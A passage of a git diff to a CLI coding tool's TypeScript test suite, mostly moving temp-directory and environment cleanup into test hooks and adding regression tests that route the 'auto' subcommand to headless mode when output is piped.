+  assertExtensionIndexExists(fakeAgentDir, "gsd");
 });
 
-test("initResources skips copy when managed version matches current version", async () => {
+test("initResources skips copy when managed version matches current version", async (t) => {
   const { initResources, readManagedResourceVersion } = await import("../resource-loader.ts");
   const tmp = mkdtempSync(join(tmpdir(), "gsd-resources-skip-"));
   const fakeAgentDir = join(tmp, "agent");
 
-  try {
-    // First run: full sync (no manifest yet)
-    initResources(fakeAgentDir);
-    const version = readManagedResourceVersion(fakeAgentDir);
-    assert.ok(version, "manifest written after first sync");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+  // First run: full sync (no manifest yet)
+  initResources(fakeAgentDir);
+  const version = readManagedResourceVersion(fakeAgentDir);
+  assert.ok(version, "manifest written after first sync");
 
-    // Add a marker file to detect whether sync runs again
-    const markerPath = join(fakeAgentDir, "extensions", "gsd", "_marker.txt");
-    writeFileSync(markerPath, "test-marker");
+  // Add a marker file to detect whether sync runs again
+  const markerPath = join(fakeAgentDir, "extensions", "gsd", "_marker.txt");
+  writeFileSync(markerPath, "test-marker");
 
-    // Second run: version matches — should skip, marker survives
-    initResources(fakeAgentDir);
-    assert.ok(existsSync(markerPath), "marker file survives when version matches (sync skipped)");
+  // Second run: version matches — should skip, marker survives
+  initResources(fakeAgentDir);
+  assert.ok(existsSync(markerPath), "marker file survives when version matches (sync skipped)");
 
-    // Simulate version mismatch by writing older version to manifest
-    const manifestPath = join(fakeAgentDir, "managed-resources.json");
-    writeFileSync(manifestPath, JSON.stringify({ gsdVersion: "0.0.1", syncedAt: Date.now() }));
+  // Simulate version mismatch by writing older version to manifest
+  const manifestPath = join(fakeAgentDir, "managed-resources.json");
+  writeFileSync(manifestPath, JSON.stringify({ gsdVersion: "0.0.1", syncedAt: Date.now() }));
 
-    // Third run: version mismatch — full sync, marker removed
-    initResources(fakeAgentDir);
-    assert.ok(!existsSync(markerPath), "marker file removed after version-mismatch sync");
+  // Third run: version mismatch — full sync, marker removed
+  initResources(fakeAgentDir);
+  assert.ok(!existsSync(markerPath), "marker file removed after version-mismatch sync");
 
-    // Manifest updated to current version
-    const updatedVersion = readManagedResourceVersion(fakeAgentDir);
-    assert.strictEqual(updatedVersion, version, "manifest updated to current version after sync");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  // Manifest updated to current version
+  const updatedVersion = readManagedResourceVersion(fakeAgentDir);
+  assert.strictEqual(updatedVersion, version, "manifest updated to current version after sync");
 });
 
 // ═══════════════════════════════════════════════════════════════════════════
 // 4. wizard loadStoredEnvKeys hydration
 // ═══════════════════════════════════════════════════════════════════════════
 
-test("loadStoredEnvKeys hydrates process.env from auth.json", async () => {
+test("loadStoredEnvKeys hydrates process.env from auth.json", async (t) => {
   const { loadStoredEnvKeys } = await import("../wizard.ts");
   const { AuthStorage } = await import("@gsd/pi-coding-agent");
 
@@ -231,30 +295,29 @@ test("loadStoredEnvKeys hydrates process.env from auth.json", async () => {
     delete process.env[v];
   }
 
-  try {
-    const auth = AuthStorage.create(authPath);
-    loadStoredEnvKeys(auth);
-
-    assert.equal(process.env.BRAVE_API_KEY, "test-brave-key", "BRAVE_API_KEY hydrated");
-    assert.equal(process.env.BRAVE_ANSWERS_KEY, "test-answers-key", "BRAVE_ANSWERS_KEY hydrated");
-    assert.equal(process.env.CONTEXT7_API_KEY, "test-ctx7-key", "CONTEXT7_API_KEY hydrated");
-    assert.equal(process.env.JINA_API_KEY, undefined, "JINA_API_KEY not set (not in auth)");
-    assert.equal(process.env.TAVILY_API_KEY, "test-tavily-key", "TAVILY_API_KEY hydrated");
-    assert.equal(process.env.TELEGRAM_BOT_TOKEN, "test-telegram-key", "TELEGRAM_BOT_TOKEN hydrated");
-    assert.equal(process.env.CUSTOM_OPENAI_API_KEY, "test-custom-openai-key", "CUSTOM_OPENAI_API_KEY hydrated");
-  } finally {
+  t.after(() => {
     for (const v of envVarsToRestore) {
-      if (origValues[v]) process.env[v] = origValues[v]; else delete process.env[v];
+    if (origValues[v]) process.env[v] = origValues[v]; else delete process.env[v];
     }
     rmSync(tmp, { recursive: true, force: true });
-  }
+  });
+  const auth = AuthStorage.create(authPath);
+  loadStoredEnvKeys(auth);
+
+  assert.equal(process.env.BRAVE_API_KEY, "test-brave-key", "BRAVE_API_KEY hydrated");
+  assert.equal(process.env.BRAVE_ANSWERS_KEY, "test-answers-key", "BRAVE_ANSWERS_KEY hydrated");
+  assert.equal(process.env.CONTEXT7_API_KEY, "test-ctx7-key", "CONTEXT7_API_KEY hydrated");
+  assert.equal(process.env.JINA_API_KEY, undefined, "JINA_API_KEY not set (not in auth)");
+  assert.equal(process.env.TAVILY_API_KEY, "test-tavily-key", "TAVILY_API_KEY hydrated");
+  assert.equal(process.env.TELEGRAM_BOT_TOKEN, "test-telegram-key", "TELEGRAM_BOT_TOKEN hydrated");
+  assert.equal(process.env.CUSTOM_OPENAI_API_KEY, "test-custom-openai-key", "CUSTOM_OPENAI_API_KEY hydrated");
 });
 
 // ═══════════════════════════════════════════════════════════════════════════
 // 5. loadStoredEnvKeys does NOT overwrite existing env vars
 // ═══════════════════════════════════════════════════════════════════════════
 
-test("loadStoredEnvKeys does not overwrite existing env vars", async () => {
+test("loadStoredEnvKeys does not overwrite existing env vars", async (t) => {
   const { loadStoredEnvKeys } = await import("../wizard.ts");
   const { AuthStorage } = await import("@gsd/pi-coding-agent");
 
@@ -267,122 +330,109 @@ test("loadStoredEnvKeys does not overwrite existing env vars", async () => {
   const origBrave = process.env.BRAVE_API_KEY;
   process.env.BRAVE_API_KEY = "existing-env-key";
 
-  try {
-    const auth = AuthStorage.create(authPath);
-    loadStoredEnvKeys(auth);
-
-    assert.equal(process.env.BRAVE_API_KEY, "existing-env-key", "existing env var not overwritten");
-  } finally {
+  t.after(() => {
     if (origBrave) process.env.BRAVE_API_KEY = origBrave; else delete process.env.BRAVE_API_KEY;
     rmSync(tmp, { recursive: true, force: true });
-  }
+  });
+  const auth = AuthStorage.create(authPath);
+  loadStoredEnvKeys(auth);
+
+  assert.equal(process.env.BRAVE_API_KEY, "existing-env-key", "existing env var not overwritten");
 });
 
 // ═══════════════════════════════════════════════════════════════════════════
 // 6. State derivation — Gap 2
 // ═══════════════════════════════════════════════════════════════════════════
 
-test("deriveState returns pre-planning phase for empty .gsd/ directory", async () => {
+test("deriveState returns pre-planning phase for empty .gsd/ directory", async (t) => {
   const { deriveState } = await import("../resources/extensions/gsd/state.ts");
   const tmp = mkdtempSync(join(tmpdir(), "gsd-state-smoke-"));
 
   // Create minimal .gsd/ structure with no milestones
   mkdirSync(join(tmp, ".gsd"), { recursive: true });
 
-  try {
-    const state = await deriveState(tmp);
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+  const state = await deriveState(tmp);
 
-    assert.equal(state.phase, "pre-planning",
-      `expected pre-planning phase for empty .gsd/, got: ${state.phase}`);
-    assert.equal(state.activeMilestone, null, "no active milestone");
-    assert.equal(state.activeSlice, null, "no active slice");
-    assert.equal(state.activeTask, null, "no active task");
-    assert.ok(Array.isArray(state.blockers), "blockers is an array");
-    assert.ok(Array.isArray(state.registry), "registry is an array");
-    assert.equal(state.registry.length, 0, "empty registry");
-    assert.ok(typeof state.nextAction === "string", "nextAction is a string");
-    assert.ok(state.nextAction.length > 0, "nextAction is non-empty");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  assert.equal(state.phase, "pre-planning",
+    `expected pre-planning phase for empty .gsd/, got: ${state.phase}`);
+  assert.equal(state.activeMilestone, null, "no active milestone");
+  assert.equal(state.activeSlice, null, "no active slice");
+  assert.equal(state.activeTask, null, "no active task");
+  assert.ok(Array.isArray(state.blockers), "blockers is an array");
+  assert.ok(Array.isArray(state.registry), "registry is an array");
+  assert.equal(state.registry.length, 0, "empty registry");
+  assert.ok(typeof state.nextAction === "string", "nextAction is a string");
+  assert.ok(state.nextAction.length > 0, "nextAction is non-empty");
 });
 
-test("deriveState returns pre-planning phase when no .gsd/ directory exists", async () => {
+test("deriveState returns pre-planning phase when no .gsd/ directory exists", async (t) => {
   const { deriveState } = await import("../resources/extensions/gsd/state.ts");
   // Use a temp dir with no .gsd/ subdirectory at all
   const tmp = mkdtempSync(join(tmpdir(), "gsd-state-nogsd-"));
 
-  try {
-    // Should not throw — missing .gsd/ is a valid "no project" state
-    const state = await deriveState(tmp);
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+  // Should not throw — missing .gsd/ is a valid "no project" state
+  const state = await deriveState(tmp);
 
-    assert.equal(state.phase, "pre-planning",
-      `expected pre-planning phase when .gsd/ absent, got: ${state.phase}`);
-    assert.equal(state.activeMilestone, null, "no active milestone");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  assert.equal(state.phase, "pre-planning",
+    `expected pre-planning phase when .gsd/ absent, got: ${state.phase}`);
+  assert.equal(state.activeMilestone, null, "no active milestone");
 });
 
-test("deriveState shape is structurally complete", async () => {
+test("deriveState shape is structurally complete", async (t) => {
   const { deriveState } = await import("../resources/extensions/gsd/state.ts");
   const tmp = mkdtempSync(join(tmpdir(), "gsd-state-shape-"));
   mkdirSync(join(tmp, ".gsd"), { recursive: true });
 
-  try {
-    const state = await deriveState(tmp);
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+  const state = await deriveState(tmp);
 
-    // All required fields present
-    const requiredFields = [
-      "phase", "activeMilestone", "activeSlice", "activeTask",
-      "recentDecisions", "blockers", "nextAction", "registry",
-    ] as const;
-    for (const field of requiredFields) {
-      assert.ok(field in state, `state.${field} should be present`);
-    }
-
-    // phase is a known string value
-    const validPhases = [
-      "pre-planning", "needs-discussion", "researching", "planning",
-      "executing", "summarizing", "replanning-slice", "validating-milestone",
-      "completing-milestone", "complete", "blocked",
-    ];
-    assert.ok(validPhases.includes(state.phase),
-      `state.phase '${state.phase}' should be a known phase`);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
+  // All required fields present
+  const requiredFields = [
+    "phase", "activeMilestone", "activeSlice", "activeTask",
+    "recentDecisions", "blockers", "nextAction", "registry",
+  ] as const;
+  for (const field of requiredFields) {
+    assert.ok(field in state, `state.${field} should be present`);
   }
+
+  // phase is a known string value
+  const validPhases = [
+    "pre-planning", "needs-discussion", "researching", "planning",
+    "executing", "summarizing", "replanning-slice", "validating-milestone",
+    "completing-milestone", "complete", "blocked",
+  ];
+  assert.ok(validPhases.includes(state.phase),
+    `state.phase '${state.phase}' should be a known phase`);
 });
 
 // ═══════════════════════════════════════════════════════════════════════════
 // 7. Doctor health checks — Gap 3
 // ═══════════════════════════════════════════════════════════════════════════
 
-test("runGSDDoctor completes without throwing on empty .gsd/ directory", async () => {
+test("runGSDDoctor completes without throwing on empty .gsd/ directory", async (t) => {
   const { runGSDDoctor } = await import("../resources/extensions/gsd/doctor.ts");
   const tmp = mkdtempSync(join(tmpdir(), "gsd-doctor-smoke-"));
   mkdirSync(join(tmp, ".gsd"), { recursive: true });
 
-  try {
-    // audit-only mode (fix: false) — should never throw
-    const report = await runGSDDoctor(tmp, { fix: false });
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+  // audit-only mode (fix: false) — should never throw
+  const report = await runGSDDoctor(tmp, { fix: false });
 
-    // Structural assertions on the DoctorReport
-    assert.ok(typeof report === "object" && report !== null, "report is an object");
-    assert.ok("ok" in report, "report has ok field");
-    assert.ok("issues" in report, "report has issues field");
-    assert.ok("fixesApplied" in report, "report has fixesApplied field");
-    assert.ok("basePath" in report, "report has basePath field");
-    assert.ok(Array.isArray(report.issues), "report.issues is an array");
-    assert.ok(Array.isArray(report.fixesApplied), "report.fixesApplied is an array");
-    assert.equal(typeof report.ok, "boolean", "report.ok is a boolean");
-    assert.equal(report.fixesApplied.length, 0, "no fixes applied in audit mode");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  // Structural assertions on the DoctorReport
+  assert.ok(typeof report === "object" && report !== null, "report is an object");
+  assert.ok("ok" in report, "report has ok field");
+  assert.ok("issues" in report, "report has issues field");
+  assert.ok("fixesApplied" in report, "report has fixesApplied field");
+  assert.ok("basePath" in report, "report has basePath field");
+  assert.ok(Array.isArray(report.issues), "report.issues is an array");
+  assert.ok(Array.isArray(report.fixesApplied), "report.fixesApplied is an array");
+  assert.equal(typeof report.ok, "boolean", "report.ok is a boolean");
+  assert.equal(report.fixesApplied.length, 0, "no fixes applied in audit mode");
 });
 
-test("runGSDDoctor issue objects have required fields", async () => {
+test("runGSDDoctor issue objects have required fields", async (t) => {
   const { runGSDDoctor } = await import("../resources/extensions/gsd/doctor.ts");
   const tmp = mkdtempSync(join(tmpdir(), "gsd-doctor-fields-"));
   mkdirSync(join(tmp, ".gsd"), { recursive: true });
@@ -392,28 +442,25 @@ test("runGSDDoctor issue objects have required fields", async () => {
   mkdirSync(mDir, { recursive: true });
   writeFileSync(join(mDir, "M001-CONTEXT.md"), "# Context\n");
 
-  try {
-    const report = await runGSDDoctor(tmp, { fix: false });
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+  const report = await runGSDDoctor(tmp, { fix: false });
 
-    // Should find at least one issue (missing roadmap for M001)
-    assert.ok(report.issues.length > 0, "expected at least one issue for milestone missing ROADMAP.md");
+  // Should find at least one issue (missing roadmap for M001)
+  assert.ok(report.issues.length > 0, "expected at least one issue for milestone missing ROADMAP.md");
 
-    // Verify structure of each issue
-    for (const issue of report.issues) {
-      assert.ok(typeof issue.severity === "string", "issue.severity is a string");
-      assert.ok(["info", "warning", "error"].includes(issue.severity),
-        `issue.severity '${issue.severity}' should be info|warning|error`);
-      assert.ok(typeof issue.code === "string", "issue.code is a string");
-      assert.ok(typeof issue.message === "string", "issue.message is a string");
-      assert.ok(issue.message.length > 0, "issue.message is non-empty");
-      assert.ok(typeof issue.fixable === "boolean", "issue.fixable is a boolean");
-    }
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
+  // Verify structure of each issue
+  for (const issue of report.issues) {
+    assert.ok(typeof issue.severity === "string", "issue.severity is a string");
+    assert.ok(["info", "warning", "error"].includes(issue.severity),
+      `issue.severity '${issue.severity}' should be info|warning|error`);
+    assert.ok(typeof issue.code === "string", "issue.code is a string");
+    assert.ok(typeof issue.message === "string", "issue.message is a string");
+    assert.ok(issue.message.length > 0, "issue.message is non-empty");
+    assert.ok(typeof issue.fixable === "boolean", "issue.fixable is a boolean");
   }
 });
 
-test("runGSDDoctor with fix:false never modifies the filesystem", async () => {
+test("runGSDDoctor with fix:false never modifies the filesystem", async (t) => {
   const { runGSDDoctor } = await import("../resources/extensions/gsd/doctor.ts");
   const tmp = mkdtempSync(join(tmpdir(), "gsd-doctor-readonly-"));
   const gsdDir = join(tmp, ".gsd");
@@ -423,13 +470,10 @@ test("runGSDDoctor with fix:false never modifies the filesystem", async () => {
   const sentinelPath = join(gsdDir, "SENTINEL.md");
   writeFileSync(sentinelPath, "# sentinel\n");
 
-  try {
-    await runGSDDoctor(tmp, { fix: false });
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+  await runGSDDoctor(tmp, { fix: false });
 
-    assert.ok(existsSync(sentinelPath), "sentinel file still exists after audit-only run");
-    const content = readFileSync(sentinelPath, "utf-8");
-    assert.equal(content, "# sentinel\n", "sentinel file content unchanged");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  assert.ok(existsSync(sentinelPath), "sentinel file still exists after audit-only run");
+  const content = readFileSync(sentinelPath, "utf-8");
+  assert.equal(content, "# sentinel\n", "sentinel file content unchanged");
 });
diff --git a/src/tests/artifact-manager.test.ts b/src/tests/artifact-manager.test.ts
index 426dbbf74..8fd89bcaa 100644
--- a/src/tests/artifact-manager.test.ts
+++ b/src/tests/artifact-manager.test.ts
@@ -23,144 +23,117 @@ function makeTmpSession(): { sessionFile: string; cleanup: () => void } {
 // save / getPath
 // ═══════════════════════════════════════════════════════════════════════════
 
-test('save creates artifact file with sequential ID', () => {
+test('save creates artifact file with sequential ID', (t) => {
 	const { sessionFile, cleanup } = makeTmpSession()
-	try {
-		const mgr = new ArtifactManager(sessionFile)
-		const id0 = mgr.save('output 0', 'bash')
-		const id1 = mgr.save('output 1', 'bash')
+	t.after(cleanup);
+	const mgr = new ArtifactManager(sessionFile)
+	const id0 = mgr.save('output 0', 'bash')
+	const id1 = mgr.save('output 1', 'bash')
 
-		assert.equal(id0, '0')
-		assert.equal(id1, '1')
+	assert.equal(id0, '0')
+	assert.equal(id1, '1')
 
-		const path0 = mgr.getPath('0')
-		assert.ok(path0)
-		assert.equal(readFileSync(path0, 'utf-8'), 'output 0')
+	const path0 = mgr.getPath('0')
+	assert.ok(path0)
+	assert.equal(readFileSync(path0, 'utf-8'), 'output 0')
 
-		const path1 = mgr.getPath('1')
-		assert.ok(path1)
-		assert.equal(readFileSync(path1, 'utf-8'), 'output 1')
-	} finally {
-		cleanup()
-	}
+	const path1 = mgr.getPath('1')
+	assert.ok(path1)
+	assert.equal(readFileSync(path1, 'utf-8'), 'output 1')
 })
 
-test('artifact directory is named after session file without .jsonl', () => {
+test('artifact directory is named after session file without .jsonl', (t) => {
 	const { sessionFile, cleanup } = makeTmpSession()
-	try {
-		const mgr = new ArtifactManager(sessionFile)
-		const expectedDir = sessionFile.slice(0, -6) // strip .jsonl
-		assert.equal(mgr.dir, expectedDir)
-	} finally {
-		cleanup()
-	}
+	t.after(cleanup);
+	const mgr = new ArtifactManager(sessionFile)
+	const expectedDir = sessionFile.slice(0, -6) // strip .jsonl
+	assert.equal(mgr.dir, expectedDir)
 })
 
-test('artifact directory is created lazily on first write', () => {
+test('artifact directory is created lazily on first write', (t) => {
 	const { sessionFile, cleanup } = makeTmpSession()
-	try {
-		const mgr = new ArtifactManager(sessionFile)
-		const artifactDir = mgr.dir
+	t.after(cleanup);
+	const mgr = new ArtifactManager(sessionFile)
+	const artifactDir = mgr.dir
 
-		assert.equal(existsSync(artifactDir), false)
-		mgr.save('trigger creation', 'bash')
-		assert.ok(existsSync(artifactDir))
-	} finally {
-		cleanup()
-	}
+	assert.equal(existsSync(artifactDir), false)
+	mgr.save('trigger creation', 'bash')
+	assert.ok(existsSync(artifactDir))
 })
 
 // ═══════════════════════════════════════════════════════════════════════════
 // exists
 // ═══════════════════════════════════════════════════════════════════════════
 
-test('exists returns true for saved artifact', () => {
+test('exists returns true for saved artifact', (t) => {
 	const { sessionFile, cleanup } = makeTmpSession()
-	try {
-		const mgr = new ArtifactManager(sessionFile)
-		const id = mgr.save('content', 'bash')
-		assert.ok(mgr.exists(id))
-	} finally {
-		cleanup()
-	}
+	t.after(cleanup);
+	const mgr = new ArtifactManager(sessionFile)
+	const id = mgr.save('content', 'bash')
+	assert.ok(mgr.exists(id))
 })
 
-test('exists returns false for missing artifact', () => {
+test('exists returns false for missing artifact', (t) => {
 	const { sessionFile, cleanup } = makeTmpSession()
-	try {
-		const mgr = new ArtifactManager(sessionFile)
-		assert.equal(mgr.exists('999'), false)
-	} finally {
-		cleanup()
-	}
+	t.after(cleanup);
+	const mgr = new ArtifactManager(sessionFile)
+	assert.equal(mgr.exists('999'), false)
 })
 
 // ═══════════════════════════════════════════════════════════════════════════
 // allocatePath
 // ═══════════════════════════════════════════════════════════════════════════
 
-test('allocatePath returns path without writing', () => {
+test('allocatePath returns path without writing', (t) => {
 	const { sessionFile, cleanup } = makeTmpSession()
-	try {
-		const mgr = new ArtifactManager(sessionFile)
-		const { id, path } = mgr.allocatePath('fetch')
+	t.after(cleanup);
+	const mgr = new ArtifactManager(sessionFile)
+	const { id, path } = mgr.allocatePath('fetch')
 
-		assert.equal(id, '0')
-		assert.ok(path.endsWith('0.fetch.log'))
-		// File should not exist yet — allocatePath doesn't write
-		assert.equal(existsSync(path), false)
-	} finally {
-		cleanup()
-	}
+	assert.equal(id, '0')
+	assert.ok(path.endsWith('0.fetch.log'))
+	// File should not exist yet — allocatePath doesn't write
+	assert.equal(existsSync(path), false)
 })
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Session resume — ID continuity
 // ═══════════════════════════════════════════════════════════════════════════
 
-test('new manager picks up where previous left off', () => {
+test('new manager picks up where previous left off', (t) => {
 	const { sessionFile, cleanup } = makeTmpSession()
-	try {
-		const mgr1 = new ArtifactManager(sessionFile)
-		mgr1.save('first', 'bash')
-		mgr1.save('second', 'bash')
+	t.after(cleanup);
+	const mgr1 = new ArtifactManager(sessionFile)
+	mgr1.save('first', 'bash')
+	mgr1.save('second', 'bash')
 
-		// Simulate session resume — new manager for same session file
-		const mgr2 = new ArtifactManager(sessionFile)
-		const id = mgr2.save('third', 'bash')
+	// Simulate session resume — new manager for same session file
+	const mgr2 = new ArtifactManager(sessionFile)
+	const id = mgr2.save('third', 'bash')
 
-		assert.equal(id, '2') // continues from 0, 1 → next is 2
-	} finally {
-		cleanup()
-	}
+	assert.equal(id, '2') // continues from 0, 1 → next is 2
 })
 
 // ═══════════════════════════════════════════════════════════════════════════
 // listFiles
 // ═══════════════════════════════════════════════════════════════════════════
 
-test('listFiles returns all artifact filenames', () => {
+test('listFiles returns all artifact filenames', (t) => {
 	const { sessionFile, cleanup } = makeTmpSession()
-	try {
-		const mgr = new ArtifactManager(sessionFile)
-		mgr.save('a', 'bash')
-		mgr.save('b', 'fetch')
+	t.after(cleanup);
+	const mgr = new ArtifactManager(sessionFile)
+	mgr.save('a', 'bash')
+	mgr.save('b', 'fetch')
 
-		const files = mgr.listFiles()
-		assert.equal(files.length, 2)
-		assert.ok(files.some(f => f === '0.bash.log'))
-		assert.ok(files.some(f => f === '1.fetch.log'))
-	} finally {
-		cleanup()
-	}
+	const files = mgr.listFiles()
+	assert.equal(files.length, 2)
+	assert.ok(files.some(f => f === '0.bash.log'))
+	assert.ok(files.some(f => f === '1.fetch.log'))
 })
 
-test('listFiles returns empty for nonexistent dir', () => {
+test('listFiles returns empty for nonexistent dir', (t) => {
 	const { sessionFile, cleanup } = makeTmpSession()
-	try {
-		const mgr = new ArtifactManager(sessionFile)
-		assert.deepEqual(mgr.listFiles(), [])
-	} finally {
-		cleanup()
-	}
+	t.after(cleanup);
+	const mgr = new ArtifactManager(sessionFile)
+	assert.deepEqual(mgr.listFiles(), [])
 })
diff --git a/src/tests/auto-mode-piped.test.ts b/src/tests/auto-mode-piped.test.ts
new file mode 100644
index 000000000..005dddadd
--- /dev/null
+++ b/src/tests/auto-mode-piped.test.ts
@@ -0,0 +1,106 @@
+/**
+ * Tests for `gsd auto` routing — verifies that `auto` is recognized as a
+ * subcommand alias for `headless auto` so it doesn't fall through to the
+ * interactive TUI, which hangs when stdin/stdout are piped.
+ *
+ * Regression test for #2732.
+ */
+
+import test from 'node:test'
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import { join } from 'node:path'
+import { fileURLToPath } from 'node:url'
+
+const projectRoot = join(fileURLToPath(import.meta.url), '..', '..', '..')
+
+// ---------------------------------------------------------------------------
+// Source-level verification: cli.ts must handle 'auto' before TUI
+// ---------------------------------------------------------------------------
+
+/**
+ * Read cli.ts and verify the 'auto' subcommand is routed before the
+ * interactive TUI code path. This is the definitive test — if cli.ts doesn't
+ * handle 'auto', piped invocations will hang (#2732).
+ */
+function cliSourceHandlesAutoBeforeTUI(): boolean {
+  const cliSource = readFileSync(join(projectRoot, 'src', 'cli.ts'), 'utf-8')
+
+  // Find the position of the 'auto' subcommand handler
+  // It should appear as: messages[0] === 'auto'
+  const autoHandlerMatch = cliSource.match(
+    /messages\[0\]\s*===\s*['"]auto['"]/,
+  )
+  if (!autoHandlerMatch) return false
+
+  // Find the position of the InteractiveMode TUI entry
+  const tuiMatch = cliSource.match(/new\s+InteractiveMode\s*\(/)
+  if (!tuiMatch) return false
+
+  // The auto handler must appear BEFORE the TUI in the source
+  const autoPos = cliSource.indexOf(autoHandlerMatch[0])
+  const tuiPos = cliSource.indexOf(tuiMatch[0])
+
+  return autoPos < tuiPos
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Core regression test: `gsd auto` must be handled before TUI (#2732)
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('cli.ts handles `auto` subcommand before interactive TUI (#2732)', () => {
+  assert.ok(
+    cliSourceHandlesAutoBeforeTUI(),
+    'cli.ts must route messages[0] === "auto" to a handler BEFORE ' +
+    'reaching `new InteractiveMode()`. Without this, `gsd auto` with ' +
+    'piped stdin/stdout falls through to the TUI and hangs.',
+  )
+})
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Verify the auto handler routes to headless (not a stub/no-op)
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('cli.ts routes `auto` to headless runner', () => {
+  const cliSource = readFileSync(join(projectRoot, 'src', 'cli.ts'), 'utf-8')
+
+  // The auto handler block should import or reference headless
+  // Look for the auto block and check it contains runHeadless or headless
+  const autoBlockRegex = /messages\[0\]\s*===\s*['"]auto['"][\s\S]*?runHeadless/
+  assert.ok(
+    autoBlockRegex.test(cliSource),
+    '`auto` subcommand handler must invoke runHeadless to delegate to headless mode',
+  )
+})
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Verify piped-mode hint in error message when auto mode is not available
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('TTY error message mentions `gsd auto` as a non-interactive alternative', () => {
+  const cliSource = readFileSync(join(projectRoot, 'src', 'cli.ts'), 'utf-8')
+
+  // The TTY error message should mention auto as an alternative
+  assert.ok(
+    cliSource.includes('gsd auto') || cliSource.includes('gsd headless'),
+    'TTY error hints should mention headless/auto mode as alternatives',
+  )
+})
+
+// ═══════════════════════════════════════════════════════════════════════════
+// `gsd headless` still works (no regression)
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('cli.ts handles `headless` subcommand before interactive TUI', () => {
+  const cliSource = readFileSync(join(projectRoot, 'src', 'cli.ts'), 'utf-8')
+
+  const headlessMatch = cliSource.match(/messages\[0\]\s*===\s*['"]headless['"]/)
+  const tuiMatch = cliSource.match(/new\s+InteractiveMode\s*\(/)
+
+  assert.ok(headlessMatch, 'headless subcommand handler exists')
+  assert.ok(tuiMatch, 'InteractiveMode TUI exists')
+
+  const headlessPos = cliSource.indexOf(headlessMatch![0])
+  const tuiPos = cliSource.indexOf(tuiMatch![0])
+  assert.ok(headlessPos < tuiPos, 'headless handler is before TUI')
+})
diff --git a/src/tests/auto-piped-io.test.ts b/src/tests/auto-piped-io.test.ts
new file mode 100644
index 000000000..84bb5fbc1
--- /dev/null
+++ b/src/tests/auto-piped-io.test.ts
@@ -0,0 +1,172 @@
+/**
+ * Tests for auto-mode piped I/O detection (#2732).
+ *
+ * When `gsd auto` is run with piped stdout (e.g. `gsd auto | cat`),
+ * the CLI should detect the non-TTY stdout and redirect to headless
+ * mode instead of hanging in interactive mode trying to set up a TUI
+ * on a non-terminal output stream.
+ *
+ * Also verifies the stdout TTY gate at the interactive mode entry point:
+ * when stdout is piped, interactive mode must not be entered regardless
+ * of the subcommand.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+
+// ─── Extracted detection logic (mirrors cli.ts) ───────────────────────────
+
+/**
+ * Subcommands that are explicitly handled before the interactive mode
+ * section in cli.ts and therefore never fall through to the TUI.
+ */
+const EXPLICIT_SUBCOMMANDS = new Set([
+  "headless",
+  "update",
+  "config",
+  "worktree",
+  "wt",
+  "sessions",
+  "web",
+]);
+
+/**
+ * Detect whether the current subcommand should be auto-redirected
+ * to headless mode when stdout is not a TTY.
+ *
+ * Returns true when: the subcommand is "auto" AND stdout is piped.
+ */
+function shouldRedirectAutoToHeadless(
+  subcommand: string | undefined,
+  stdoutIsTTY: boolean,
+): boolean {
+  if (stdoutIsTTY) return false;
+  return subcommand === "auto";
+}
+
+/**
+ * Check whether interactive mode can be entered.
+ * Both stdin AND stdout must be TTY for the TUI to work.
+ */
+function canEnterInteractiveMode(
+  stdinIsTTY: boolean,
+  stdoutIsTTY: boolean,
+): boolean {
+  return stdinIsTTY && stdoutIsTTY;
+}
+
+/**
+ * Returns true if the subcommand is handled by an explicit branch
+ * in cli.ts and will never reach the interactive mode section.
+ */
+function isExplicitSubcommand(subcommand: string | undefined): boolean {
+  return subcommand !== undefined && EXPLICIT_SUBCOMMANDS.has(subcommand);
+}
+
+// ─── shouldRedirectAutoToHeadless ─────────────────────────────────────────
+
+test("redirects 'auto' to headless when stdout is piped", () => {
+  assert.ok(shouldRedirectAutoToHeadless("auto", false));
+});
+
+test("does NOT redirect 'auto' when stdout is a TTY", () => {
+  assert.ok(!shouldRedirectAutoToHeadless("auto", true));
+});
+
+test("does NOT redirect non-auto subcommands when stdout is piped", () => {
+  assert.ok(!shouldRedirectAutoToHeadless("headless", false));
+  assert.ok(!shouldRedirectAutoToHeadless("config", false));
+  assert.ok(!shouldRedirectAutoToHeadless("update", false));
+  assert.ok(!shouldRedirectAutoToHeadless(undefined, false));
+});
+
+// ─── canEnterInteractiveMode ──────────────────────────────────────────────
+
+test("allows interactive mode when both stdin and stdout are TTY", () => {
+  assert.ok(canEnterInteractiveMode(true, true));
+});
+
+test("blocks interactive mode when stdin is piped", () => {
+  assert.ok(!canEnterInteractiveMode(false, true));
+});
+
+test("blocks interactive mode when stdout is piped", () => {
+  assert.ok(!canEnterInteractiveMode(true, false));
+});
+
+test("blocks interactive mode when both stdin and stdout are piped", () => {
+  assert.ok(!canEnterInteractiveMode(false, false));
+});
+
+// ─── isExplicitSubcommand ─────────────────────────────────────────────────
+
+test("identifies explicitly handled subcommands", () => {
+  assert.ok(isExplicitSubcommand("headless"));
+  assert.ok(isExplicitSubcommand("update"));
+  assert.ok(isExplicitSubcommand("config"));
+  assert.ok(isExplicitSubcommand("worktree"));
+  assert.ok(isExplicitSubcommand("wt"));
+  assert.ok(isExplicitSubcommand("sessions"));
